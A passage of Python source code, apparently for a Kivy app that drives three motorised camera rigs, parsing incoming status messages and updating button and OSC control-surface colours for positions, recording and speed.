cam3AtPos4 = False
cam3Pos5Run = False
cam3Pos5Set = False
cam3AtPos5 = False
cam3Pos6Run = False
cam3Pos6Set = False
cam3AtPos6 = False
elif msg[1:4] == "314":
cam3isRecording = False
self.root.ids.cam3Record.background_color = get_color_from_hex("#666666")
self.root.ids.cam3Record.text = "Record"
client.send_message("/style/bgcolor/6/16", [50, 50, 50])
elif msg[1:4] == "324":
cam3isRecording = True
self.root.ids.cam3Record.background_color = get_color_from_hex("#7D0000")
self.root.ids.cam3Record.text = "Recording"
client.send_message("/style/bgcolor/6/16", [225, 0, 0])
elif msg[1] == "?":
cam1AtPos1 = False
cam1AtPos2 = False
cam1AtPos3 = False
cam1AtPos4 = False
cam1AtPos5 = False
cam1AtPos6 = False
elif msg[1] == "!":
cam2AtPos1 = False
cam2AtPos2 = False
cam2AtPos3 = False
cam2AtPos4 = False
cam2AtPos5 = False
cam2AtPos6 = False
elif msg[1] == "@":
cam3AtPos1 = False
cam3AtPos2 = False
cam3AtPos3 = False
cam3AtPos4 = False
cam3AtPos5 = False
cam3AtPos6 = False
elif msg[0:2] == "=1":
cam1SliderSpeed = int(msg[2])
elif msg[0:2] == "=2":
cam2SliderSpeed = int(msg[2])
elif msg[0:2] == "=3":
cam3SliderSpeed = int(msg[2])
elif msg[0:3] == "=@1":
cam1PTSpeed = int(msg[3])
elif msg[0:3] == "=@2":
cam2PTSpeed = int(msg[3])
elif msg[0:3] == "=@3":
cam3PTSpeed = int(msg[3])
elif msg[0:2] == "#$":
return
elif msg[0:4] == "Cam1":
whichCamRead = 1
self.root.ids.txtInput_read.text += ("[color=" + Cam1TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
elif msg[0:4] == "Cam2":
whichCamRead = 2
self.root.ids.txtInput_read.text += ("[color=" + Cam2TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
elif msg[0:4] == "Cam3":
whichCamRead = 3
self.root.ids.txtInput_read.text += ("[color=" + Cam3TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
else:
if whichCamRead == 1:
self.root.ids.txtInput_read.text += ("[color=" + Cam1TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
elif whichCamRead == 2:
self.root.ids.txtInput_read.text += ("[color=" + Cam2TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
elif whichCamRead == 3:
self.root.ids.txtInput_read.text += ("[color=" + Cam3TextColour + "]" + msg + "[/color]")
self.root.ids.scroll_view.scroll_y = 0
else:
self.root.ids.txtInput_read.text += ("[color=ffffff]") + msg + ("[/color]")
self.root.ids.scroll_view.scroll_y = 0
msg = ''
self.doButtonColours()
def resetButtonColours(self):
global resetButtons
resetButtons = True
self.doButtonColours()
def doButtonColours(self):
global cam1AtPos1
global cam1AtPos2
global cam1AtPos3
global cam1AtPos4
global cam1AtPos5
global cam1AtPos6
global cam1Pos1Set
global cam1Pos2Set
global cam1Pos3Set
global cam1Pos4Set
global cam1Pos5Set
global cam1Pos6Set
global cam1Pos1Run
global cam1Pos2Run
global cam1Pos3Run
global cam1Pos4Run
global cam1Pos5Run
global cam1Pos6Run
global OLDcam1AtPos1
global OLDcam1AtPos2
global OLDcam1AtPos3
global OLDcam1AtPos4
global OLDcam1AtPos5
global OLDcam1AtPos6
global OLDcam1Pos1Set
global OLDcam1Pos2Set
global OLDcam1Pos3Set
global OLDcam1Pos4Set
global OLDcam1Pos5Set
global OLDcam1Pos6Set
global OLDcam1Pos1Run
global OLDcam1Pos2Run
global OLDcam1Pos3Run
global OLDcam1Pos4Run
global OLDcam1Pos5Run
global OLDcam1Pos6Run
global cam1isRecording
global cam1isZooming
global cam2AtPos1
global cam2AtPos2
global cam2AtPos3
global cam2AtPos4
global cam2AtPos5
global cam2AtPos6
global cam2Pos1Set
global cam2Pos2Set
global cam2Pos3Set
global cam2Pos4Set
global cam2Pos5Set
global cam2Pos6Set
global cam2Pos1Run
global cam2Pos2Run
global cam2Pos3Run
global cam2Pos4Run
global cam2Pos5Run
global cam2Pos6Run
global OLDcam2AtPos1
global OLDcam2AtPos2
global OLDcam2AtPos3
global OLDcam2AtPos4
global OLDcam2AtPos5
global OLDcam2AtPos6
global OLDcam2Pos1Set
global OLDcam2Pos2Set
global OLDcam2Pos3Set
global OLDcam2Pos4Set
global OLDcam2Pos5Set
global OLDcam2Pos6Set
global OLDcam2Pos1Run
global OLDcam2Pos2Run
global OLDcam2Pos3Run
global OLDcam2Pos4Run
global OLDcam2Pos5Run
global OLDcam2Pos6Run
global cam2isRecording
global cam2isZooming
global cam3AtPos1
global cam3AtPos2
global cam3AtPos3
global cam3AtPos4
global cam3AtPos5
global cam3AtPos6
global cam3Pos1Set
global cam3Pos2Set
global cam3Pos3Set
global cam3Pos4Set
global cam3Pos5Set
global cam3Pos6Set
global cam3Pos1Run
global cam3Pos2Run
global cam3Pos3Run
global cam3Pos4Run
global cam3Pos5Run
global cam3Pos6Run
global OLDcam3AtPos1
global OLDcam3AtPos2
global OLDcam3AtPos3
global OLDcam3AtPos4
global OLDcam3AtPos5
global OLDcam3AtPos6
global OLDcam3Pos1Set
global OLDcam3Pos2Set
global OLDcam3Pos3Set
global OLDcam3Pos4Set
global OLDcam3Pos5Set
global OLDcam3Pos6Set
global OLDcam3Pos1Run
global OLDcam3Pos2Run
global OLDcam3Pos3Run
global OLDcam3Pos4Run
global OLDcam3Pos5Run
global OLDcam3Pos6Run
global cam3isRecording
global cam3isZooming
global cam1SliderSpeed
global cam2SliderSpeed
global cam3SliderSpeed
global oldCam1Speed
global oldCam2Speed
global oldCam3Speed
global cam1PTSpeed
global cam2PTSpeed
global cam3PTSpeed
global oldCam1PTSpeed
global oldCam2PTSpeed
global oldCam3PTSpeed
global moveType
global moveTypeOld
global resetButtons
if (moveType == 1) and ((moveTypeOld != moveType) or resetButtons):
moveTypeOld = moveType
client.send_message("/style/bgcolor/4/12", [0, 200, 0])
client.send_message("/style/bgcolor/5/12", [0, 200, 0])
client.send_message("/style/bgcolor/6/12", [0, 200, 0])
client.send_message("/style/bgcolor/4/20", [0, 50, 0])
client.send_message("/style/bgcolor/5/20", [0, 50, 0])
client.send_message("/style/bgcolor/6/20", [0, 50, 0])
client.send_message("/style/bgcolor/4/28", [0, 50, 0])
client.send_message("/style/bgcolor/5/28", [0, 50, 0])
client.send_message("/style/bgcolor/6/28", [0, 50, 0])
elif (moveType == 2) and ((moveTypeOld != moveType) or resetButtons):
moveTypeOld = moveType
client.send_message("/style/bgcolor/4/12", [0, 50, 0])
client.send_message("/style/bgcolor/5/12", [0, 50, 0])
client.send_message("/style/bgcolor/6/12", [0, 50, 0])
client.send_message("/style/bgcolor/4/20", [0, 200, 0])
client.send_message("/style/bgcolor/5/20", [0, 200, 0])
client.send_message("/style/bgcolor/6/20", [0, 200, 0])
client.send_message("/style/bgcolor/4/28", [0, 50, 0])
client.send_message("/style/bgcolor/5/28", [0, 50, 0])
client.send_message("/style/bgcolor/6/28", [0, 50, 0])
elif (moveType == 3) and ((moveTypeOld != moveType) or resetButtons):
moveTypeOld = moveType
client.send_message("/style/bgcolor/4/12", [0, 50, 0])
client.send_message("/style/bgcolor/5/12", [0, 50, 0])
client.send_message("/style/bgcolor/6/12", [0, 50, 0])
client.send_message("/style/bgcolor/4/20", [0, 50, 0])
client.send_message("/style/bgcolor/5/20", [0, 50, 0])
client.send_message("/style/bgcolor/6/20", [0, 50, 0])
client.send_message("/style/bgcolor/4/28", [0, 200, 0])
client.send_message("/style/bgcolor/5/28", [0, 200, 0])
client.send_message("/style/bgcolor/6/28", [0, 200, 0])
if cam1Pos1Set != OLDcam1Pos1Set or cam1Pos1Run != OLDcam1Pos1Run or cam1AtPos1 != OLDcam1AtPos1 or resetButtons:
OLDcam1Pos1Set = cam1Pos1Set
OLDcam1Pos1Run = cam1Pos1Run
OLDcam1AtPos1 = cam1AtPos1
if cam1Pos1Set and not cam1Pos1Run and not cam1AtPos1: # Set , not Run or At
self.root.ids.btnCam1Go1.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/1", [18, 70, 19])
client.send_message("/style/color/3/1", [255, 0, 0])
client.send_message("/style/bgcolor/4/1", [18, 70, 19])
client.send_message("/style/color/4/1", [255, 0, 0])
elif cam1Pos1Set and not cam1Pos1Run and cam1AtPos1: # Set & At, not Run
self.root.ids.btnCam1Go1.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/1", [48, 186, 49])
client.send_message("/style/color/3/1", [255, 255, 255])
client.send_message("/style/bgcolor/4/1", [48, 186, 49])
client.send_message("/style/color/4/1", [255, 255, 255])
elif not cam1Pos1Set:
self.root.ids.btnCam1Go1.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/1", [18, 70, 19])
client.send_message("/style/color/3/1", [0, 0, 0])
client.send_message("/style/bgcolor/4/1", [18, 70, 19])
client.send_message("/style/color/4/1", [0, 0, 0])
if cam1Pos2Set != OLDcam1Pos2Set or cam1Pos2Run != OLDcam1Pos2Run or cam1AtPos2 != OLDcam1AtPos2 or resetButtons:
OLDcam1Pos2Set = cam1Pos2Set
OLDcam1Pos2Run = cam1Pos2Run
OLDcam1AtPos2 = cam1AtPos2
if cam1Pos2Set and not cam1Pos2Run and not cam1AtPos2: # Position LEDs Cam1
self.root.ids.btnCam1Go2.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/2", [18, 70, 19])
client.send_message("/style/color/3/2", [255, 0, 0])
client.send_message("/style/bgcolor/4/2", [18, 70, 19])
client.send_message("/style/color/4/2", [255, 0, 0])
elif cam1Pos2Set and not cam1Pos2Run and cam1AtPos2:
self.root.ids.btnCam1Go2.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/2", [48, 186, 49])
client.send_message("/style/color/3/2", [255, 255, 255])
client.send_message("/style/bgcolor/4/2", [48, 186, 49])
client.send_message("/style/color/4/2", [255, 255, 255])
elif not cam1Pos2Set:
self.root.ids.btnCam1Go2.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/2", [18, 70, 19])
client.send_message("/style/color/3/2", [0, 0, 0])
client.send_message("/style/bgcolor/4/2", [18, 70, 19])
client.send_message("/style/color/4/2", [0, 0, 0])
if cam1Pos3Set != OLDcam1Pos3Set or cam1Pos3Run != OLDcam1Pos3Run or cam1AtPos3 != OLDcam1AtPos3 or resetButtons:
OLDcam1Pos3Set = cam1Pos3Set
OLDcam1Pos3Run = cam1Pos3Run
OLDcam1AtPos3 = cam1AtPos3
if cam1Pos3Set and not cam1Pos3Run and not cam1AtPos3: # Position LEDs Cam1
self.root.ids.btnCam1Go3.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/3", [18, 70, 19])
client.send_message("/style/color/3/3", [255, 0, 0])
client.send_message("/style/bgcolor/4/3", [18, 70, 19])
client.send_message("/style/color/4/3", [255, 0, 0])
elif cam1Pos3Set and not cam1Pos3Run and cam1AtPos3:
self.root.ids.btnCam1Go3.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/3", [48, 186, 49])
client.send_message("/style/color/3/3", [255, 255, 255])
client.send_message("/style/bgcolor/4/3", [48, 186, 49])
client.send_message("/style/color/4/3", [255, 255, 255])
elif not cam1Pos3Set:
self.root.ids.btnCam1Go3.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/3", [18, 70, 19])
client.send_message("/style/color/3/3", [0, 0, 0])
client.send_message("/style/bgcolor/4/3", [18, 70, 19])
client.send_message("/style/color/4/3", [0, 0, 0])
if cam1Pos4Set != OLDcam1Pos4Set or cam1Pos4Run != OLDcam1Pos4Run or cam1AtPos4 != OLDcam1AtPos4 or resetButtons:
OLDcam1Pos4Set = cam1Pos4Set
OLDcam1Pos4Run = cam1Pos4Run
OLDcam1AtPos4 = cam1AtPos4
if cam1Pos4Set and not cam1Pos4Run and not cam1AtPos4: # Position LEDs Cam1
self.root.ids.btnCam1Go4.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/4", [18, 70, 19])
client.send_message("/style/color/3/4", [255, 0, 0])
client.send_message("/style/bgcolor/4/4", [18, 70, 19])
client.send_message("/style/color/4/4", [255, 0, 0])
elif cam1Pos4Set and not cam1Pos4Run and cam1AtPos4:
self.root.ids.btnCam1Go4.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/4", [48, 186, 49])
client.send_message("/style/color/3/4", [255, 255, 255])
client.send_message("/style/bgcolor/4/4", [48, 186, 49])
client.send_message("/style/color/4/4", [255, 255, 255])
elif not cam1Pos4Set:
self.root.ids.btnCam1Go4.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/4", [18, 70, 19])
client.send_message("/style/color/3/4", [0, 0, 0])
client.send_message("/style/bgcolor/4/4", [18, 70, 19])
client.send_message("/style/color/4/4", [0, 0, 0])
if cam1Pos5Set != OLDcam1Pos5Set or cam1Pos5Run != OLDcam1Pos5Run or cam1AtPos5 != OLDcam1AtPos5 or resetButtons:
OLDcam1Pos5Set = cam1Pos5Set
OLDcam1Pos5Run = cam1Pos5Run
OLDcam1AtPos5 = cam1AtPos5
if cam1Pos5Set and not cam1Pos5Run and not cam1AtPos5: # Position LEDs Cam1
self.root.ids.btnCam1Go5.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/5", [18, 70, 19])
client.send_message("/style/color/3/5", [255, 0, 0])
client.send_message("/style/bgcolor/4/5", [18, 70, 19])
client.send_message("/style/color/4/5", [255, 0, 0])
elif cam1Pos5Set and not cam1Pos5Run and cam1AtPos5:
self.root.ids.btnCam1Go5.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/5", [48, 186, 49])
client.send_message("/style/color/3/5", [255, 255, 255])
client.send_message("/style/bgcolor/4/5", [48, 186, 49])
client.send_message("/style/color/4/5", [255, 255, 255])
elif not cam1Pos5Set:
self.root.ids.btnCam1Go5.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/5", [18, 70, 19])
client.send_message("/style/color/3/5", [0, 0, 0])
client.send_message("/style/bgcolor/4/5", [18, 70, 19])
client.send_message("/style/color/4/5", [0, 0, 0])
if cam1Pos6Set != OLDcam1Pos6Set or cam1Pos6Run != OLDcam1Pos6Run or cam1AtPos6 != OLDcam1AtPos6 or resetButtons:
OLDcam1Pos6Set = cam1Pos6Set
OLDcam1Pos6Run = cam1Pos6Run
OLDcam1AtPos6 = cam1AtPos6
if cam1Pos6Set and not cam1Pos6Run and not cam1AtPos6: # Position LEDs Cam1
self.root.ids.btnCam1Go6.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/6", [18, 70, 19])
client.send_message("/style/color/3/6", [255, 0, 0])
client.send_message("/style/bgcolor/4/6", [18, 70, 19])
client.send_message("/style/color/4/6", [255, 0, 0])
elif cam1Pos6Set and not cam1Pos6Run and cam1AtPos6:
self.root.ids.btnCam1Go6.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/6", [48, 186, 49])
client.send_message("/style/color/3/6", [255, 255, 255])
client.send_message("/style/bgcolor/4/6", [48, 186, 49])
client.send_message("/style/color/4/6", [255, 255, 255])
elif not cam1Pos6Set:
self.root.ids.btnCam1Go6.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/6", [18, 70, 19])
client.send_message("/style/color/3/6", [0, 0, 0])
client.send_message("/style/bgcolor/4/6", [18, 70, 19])
client.send_message("/style/color/4/6", [0, 0, 0])
if cam2Pos1Set != OLDcam2Pos1Set or cam2Pos1Run != OLDcam2Pos1Run or cam2AtPos1 != OLDcam2AtPos1 or resetButtons:
OLDcam2Pos1Set = cam2Pos1Set
OLDcam2Pos1Run = cam2Pos1Run
OLDcam2AtPos1 = cam2AtPos1
if cam2Pos1Set and not cam2Pos1Run and not cam2AtPos1: # Set , not Run or At
self.root.ids.btnCam2Go1.col=(1, 0, 0, 1)
#client.send_message("/Cam2Go1", [1, "00AAAAFF"])
client.send_message("/style/bgcolor/3/9", [35, 50, 70])
client.send_message("/style/color/3/9", [255, 0, 0])
client.send_message("/style/bgcolor/5/1", [35, 50, 70])
client.send_message("/style/color/5/1", [255, 0, 0])
elif cam2Pos1Set and not cam2Pos1Run and cam2AtPos1: # Set & At, not Run
self.root.ids.btnCam2Go1.col=(0, 1, 0, 1)
#client.send_message("/Cam2Go1", [1, "FFFF00FF"])
client.send_message("/style/bgcolor/3/9", [92, 133, 186])
client.send_message("/style/color/3/9", [255, 255, 255])
client.send_message("/style/bgcolor/5/1", [92, 133, 186])
client.send_message("/style/color/5/1", [255, 255, 255])
elif not cam2Pos1Set:
self.root.ids.btnCam2Go1.col=(.13, .13, .13, 1)
#client.send_message("/Cam2Go1", [0, "FFFF00FF"])
client.send_message("/style/bgcolor/3/9", [35, 50, 70])
client.send_message("/style/color/3/9", [0, 0, 0])
client.send_message("/style/bgcolor/5/1", [35, 50, 70])
client.send_message("/style/color/5/1", [0, 0, 0])
if cam2Pos2Set != OLDcam2Pos2Set or cam2Pos2Run != OLDcam2Pos2Run or cam2AtPos2 != OLDcam2AtPos2 or resetButtons:
OLDcam2Pos2Set = cam2Pos2Set
OLDcam2Pos2Run = cam2Pos2Run
OLDcam2AtPos2 = cam2AtPos2
if cam2Pos2Set and not cam2Pos2Run and not cam2AtPos2: # Position LEDs Cam2
self.root.ids.btnCam2Go2.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/10", [35, 50, 70])
client.send_message("/style/color/3/10", [255, 0, 0])
client.send_message("/style/bgcolor/5/2", [35, 50, 70])
client.send_message("/style/color/5/2", [255, 0, 0])
elif cam2Pos2Set and not cam2Pos2Run and cam2AtPos2:
self.root.ids.btnCam2Go2.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/10", [92, 133, 186])
client.send_message("/style/color/3/10", [255, 255, 255])
client.send_message("/style/bgcolor/5/2", [92, 133, 186])
client.send_message("/style/color/5/2", [255, 255, 255])
elif not cam2Pos2Set:
self.root.ids.btnCam2Go2.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/10", [35, 50, 70])
client.send_message("/style/color/3/10", [0, 0, 0])
client.send_message("/style/bgcolor/5/2", [35, 50, 70])
client.send_message("/style/color/5/2", [0, 0, 0])
if cam2Pos3Set != OLDcam2Pos3Set or cam2Pos3Run != OLDcam2Pos3Run or cam2AtPos3 != OLDcam2AtPos3 or resetButtons:
OLDcam2Pos3Set = cam2Pos3Set
OLDcam2Pos3Run = cam2Pos3Run
OLDcam2AtPos3 = cam2AtPos3
if cam2Pos3Set and not cam2Pos3Run and not cam2AtPos3: # Position LEDs Cam2
self.root.ids.btnCam2Go3.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/11", [35, 50, 70])
client.send_message("/style/color/3/11", [255, 0, 0])
client.send_message("/style/bgcolor/5/3", [35, 50, 70])
client.send_message("/style/color/5/3", [255, 0, 0])
elif cam2Pos3Set and not cam2Pos3Run and cam2AtPos3:
self.root.ids.btnCam2Go3.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/11", [92, 133, 186])
client.send_message("/style/color/3/11", [255, 255, 255])
client.send_message("/style/bgcolor/5/3", [92, 133, 186])
client.send_message("/style/color/5/3", [255, 255, 255])
elif not cam2Pos3Set:
self.root.ids.btnCam2Go3.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/11", [35, 50, 70])
client.send_message("/style/color/3/11", [0, 0, 0])
client.send_message("/style/bgcolor/5/3", [35, 50, 70])
client.send_message("/style/color/5/3", [0, 0, 0])
if cam2Pos4Set != OLDcam2Pos4Set or cam2Pos4Run != OLDcam2Pos4Run or cam2AtPos4 != OLDcam2AtPos4 or resetButtons:
OLDcam2Pos4Set = cam2Pos4Set
OLDcam2Pos4Run = cam2Pos4Run
OLDcam2AtPos4 = cam2AtPos4
if cam2Pos4Set and not cam2Pos4Run and not cam2AtPos4: # Position LEDs Cam2
self.root.ids.btnCam2Go4.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/12", [35, 50, 70])
client.send_message("/style/color/3/12", [255, 0, 0])
client.send_message("/style/bgcolor/5/4", [35, 50, 70])
client.send_message("/style/color/5/4", [255, 0, 0])
elif cam2Pos4Set and not cam2Pos4Run and cam2AtPos4:
self.root.ids.btnCam2Go4.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/12", [92, 133, 186])
client.send_message("/style/color/3/12", [255, 255, 255])
client.send_message("/style/bgcolor/5/4", [92, 133, 186])
client.send_message("/style/color/5/4", [255, 255, 255])
elif not cam2Pos4Set:
self.root.ids.btnCam2Go4.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/12", [35, 50, 70])
client.send_message("/style/color/3/12", [0, 0, 0])
client.send_message("/style/bgcolor/5/4", [35, 50, 70])
client.send_message("/style/color/5/4", [0, 0, 0])
if cam2Pos5Set != OLDcam2Pos5Set or cam2Pos5Run != OLDcam2Pos5Run or cam2AtPos5 != OLDcam2AtPos5 or resetButtons:
OLDcam2Pos5Set = cam2Pos5Set
OLDcam2Pos5Run = cam2Pos5Run
OLDcam2AtPos5 = cam2AtPos5
if cam2Pos5Set and not cam2Pos5Run and not cam2AtPos5: # Position LEDs Cam2
self.root.ids.btnCam2Go5.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/13", [35, 50, 70])
client.send_message("/style/color/3/13", [255, 0, 0])
client.send_message("/style/bgcolor/5/5", [35, 50, 70])
client.send_message("/style/color/5/5", [255, 0, 0])
elif cam2Pos5Set and not cam2Pos5Run and cam2AtPos5:
self.root.ids.btnCam2Go5.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/13", [92, 133, 186])
client.send_message("/style/color/3/13", [255, 255, 255])
client.send_message("/style/bgcolor/5/5", [92, 133, 186])
client.send_message("/style/color/5/5", [255, 255, 255])
elif not cam2Pos5Set:
self.root.ids.btnCam2Go5.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/13", [35, 50, 70])
client.send_message("/style/color/3/13", [0, 0, 0])
client.send_message("/style/bgcolor/5/5", [35, 50, 70])
client.send_message("/style/color/5/5", [0, 0, 0])
if cam2Pos6Set != OLDcam2Pos6Set or cam2Pos6Run != OLDcam2Pos6Run or cam2AtPos6 != OLDcam2AtPos6 or resetButtons:
OLDcam2Pos6Set = cam2Pos6Set
OLDcam2Pos6Run = cam2Pos6Run
OLDcam2AtPos6 = cam2AtPos6
if cam2Pos6Set and not cam2Pos6Run and not cam2AtPos6: # Position LEDs Cam2
self.root.ids.btnCam2Go6.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/14", [35, 50, 70])
client.send_message("/style/color/3/14", [255, 0, 0])
client.send_message("/style/bgcolor/5/6", [35, 50, 70])
client.send_message("/style/color/5/6", [255, 0, 0])
elif cam2Pos6Set and not cam2Pos6Run and cam2AtPos6:
self.root.ids.btnCam2Go6.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/14", [92, 133, 186])
client.send_message("/style/color/3/14", [255, 255, 255])
client.send_message("/style/bgcolor/5/6", [92, 133, 186])
client.send_message("/style/color/5/6", [255, 255, 255])
elif not cam2Pos6Set:
self.root.ids.btnCam2Go6.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/14", [35, 50, 70])
client.send_message("/style/color/3/14", [0, 0, 0])
client.send_message("/style/bgcolor/5/6", [35, 50, 70])
client.send_message("/style/color/5/6", [0, 0, 0])
if cam3Pos1Set != OLDcam3Pos1Set or cam3Pos1Run != OLDcam3Pos1Run or cam3AtPos1 != OLDcam3AtPos1 or resetButtons:
OLDcam3Pos1Set = cam3Pos1Set
OLDcam3Pos1Run = cam3Pos1Run
OLDcam3AtPos1 = cam3AtPos1
if cam3Pos1Set and not cam3Pos1Run and not cam3AtPos1: # Set , not Run or At
self.root.ids.btnCam3Go1.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/17", [70, 62, 1])
client.send_message("/style/color/3/17", [255, 0, 0])
client.send_message("/style/bgcolor/6/1", [70, 62, 1])
client.send_message("/style/color/6/1", [255, 0, 0])
elif cam3Pos1Set and not cam3Pos1Run and cam3AtPos1: # Set & At, not Run
self.root.ids.btnCam3Go1.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/17", [186, 164, 1])
client.send_message("/style/color/3/17", [255, 255, 255])
client.send_message("/style/bgcolor/6/1", [186, 164, 1])
client.send_message("/style/color/6/1", [255, 255, 255])
elif not cam3Pos1Set:
self.root.ids.btnCam3Go1.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/17", [70, 62, 1])
client.send_message("/style/color/3/17", [0, 0, 0])
client.send_message("/style/bgcolor/6/1", [70, 62, 1])
client.send_message("/style/color/6/1", [0, 0, 0])
if cam3Pos2Set != OLDcam3Pos2Set or cam3Pos2Run != OLDcam3Pos2Run or cam3AtPos2 != OLDcam3AtPos2 or resetButtons:
OLDcam3Pos2Set = cam3Pos2Set
OLDcam3Pos2Run = cam3Pos2Run
OLDcam3AtPos2 = cam3AtPos2
if cam3Pos2Set and not cam3Pos2Run and not cam3AtPos2: # Position LEDs Cam3
self.root.ids.btnCam3Go2.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/18", [70, 62, 1])
client.send_message("/style/color/3/18", [255, 0, 0])
client.send_message("/style/bgcolor/6/2", [70, 62, 1])
client.send_message("/style/color/6/2", [255, 0, 0])
elif cam3Pos2Set and not cam3Pos2Run and cam3AtPos2:
self.root.ids.btnCam3Go2.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/18", [186, 164, 1])
client.send_message("/style/color/3/18", [255, 255, 255])
client.send_message("/style/bgcolor/6/2", [186, 164, 1])
client.send_message("/style/color/6/2", [255, 255, 255])
elif not cam3Pos2Set:
self.root.ids.btnCam3Go2.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/18", [70, 62, 1])
client.send_message("/style/color/3/18", [0, 0, 0])
client.send_message("/style/bgcolor/6/2", [70, 62, 1])
client.send_message("/style/color/6/2", [0, 0, 0])
if cam3Pos3Set != OLDcam3Pos3Set or cam3Pos3Run != OLDcam3Pos3Run or cam3AtPos3 != OLDcam3AtPos3 or resetButtons:
OLDcam3Pos3Set = cam3Pos3Set
OLDcam3Pos3Run = cam3Pos3Run
OLDcam3AtPos3 = cam3AtPos3
if cam3Pos3Set and not cam3Pos3Run and not cam3AtPos3: # Position LEDs Cam3
self.root.ids.btnCam3Go3.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/19", [70, 62, 1])
client.send_message("/style/color/3/19", [255, 0, 0])
client.send_message("/style/bgcolor/6/3", [70, 62, 1])
client.send_message("/style/color/6/3", [255, 0, 0])
elif cam3Pos3Set and not cam3Pos3Run and cam3AtPos3:
self.root.ids.btnCam3Go3.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/19", [186, 164, 1])
client.send_message("/style/color/3/19", [255, 255, 255])
client.send_message("/style/bgcolor/6/3", [186, 164, 1])
client.send_message("/style/color/6/3", [255, 255, 255])
elif not cam3Pos3Set:
self.root.ids.btnCam3Go3.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/19", [70, 62, 1])
client.send_message("/style/color/3/19", [0, 0, 0])
client.send_message("/style/bgcolor/6/3", [70, 62, 1])
client.send_message("/style/color/6/3", [0, 0, 0])
if cam3Pos4Set != OLDcam3Pos4Set or cam3Pos4Run != OLDcam3Pos4Run or cam3AtPos4 != OLDcam3AtPos4 or resetButtons:
OLDcam3Pos4Set = cam3Pos4Set
OLDcam3Pos4Run = cam3Pos4Run
OLDcam3AtPos4 = cam3AtPos4
if cam3Pos4Set and not cam3Pos4Run and not cam3AtPos4: # Position LEDs Cam3
self.root.ids.btnCam3Go4.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/20", [70, 62, 1])
client.send_message("/style/color/3/20", [255, 0, 0])
client.send_message("/style/bgcolor/6/4", [70, 62, 1])
client.send_message("/style/color/6/4", [255, 0, 0])
elif cam3Pos4Set and not cam3Pos4Run and cam3AtPos4:
self.root.ids.btnCam3Go4.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/20", [186, 164, 1])
client.send_message("/style/color/3/20", [255, 255, 255])
client.send_message("/style/bgcolor/6/4", [186, 164, 1])
client.send_message("/style/color/6/4", [255, 255, 255])
elif not cam3Pos4Set:
self.root.ids.btnCam3Go4.col=(.13, .13, .13, 1)
client.send_message("/style/bgcolor/3/20", [70, 62, 1])
client.send_message("/style/color/3/20", [0, 0, 0])
client.send_message("/style/bgcolor/6/4", [70, 62, 1])
client.send_message("/style/color/6/4", [0, 0, 0])
if cam3Pos5Set != OLDcam3Pos5Set or cam3Pos5Run != OLDcam3Pos5Run or cam3AtPos5 != OLDcam3AtPos5 or resetButtons:
OLDcam3Pos5Set = cam3Pos5Set
OLDcam3Pos5Run = cam3Pos5Run
OLDcam3AtPos5 = cam3AtPos5
if cam3Pos5Set and not cam3Pos5Run and not cam3AtPos5: # Position LEDs Cam3
self.root.ids.btnCam3Go5.col=(1, 0, 0, 1)
client.send_message("/style/bgcolor/3/21", [70, 62, 1])
client.send_message("/style/color/3/21", [255, 0, 0])
client.send_message("/style/bgcolor/6/5", [70, 62, 1])
client.send_message("/style/color/6/5", [255, 0, 0])
elif cam3Pos5Set and not cam3Pos5Run and cam3AtPos5:
self.root.ids.btnCam3Go5.col=(0, 1, 0, 1)
client.send_message("/style/bgcolor/3/21", [186, 164, 1])
client.send_message("/style/color/3/21", [255, 255, 255])
client.send_message("/style/bgcolor/6/5", [186, 164, 1])
client.send_message("/style/color/6/5", [255, 255, 255])
elif not cam3Pos5Set:
self.root.ids.btnCam3Go5.col=(.13, .13, .13, 1)
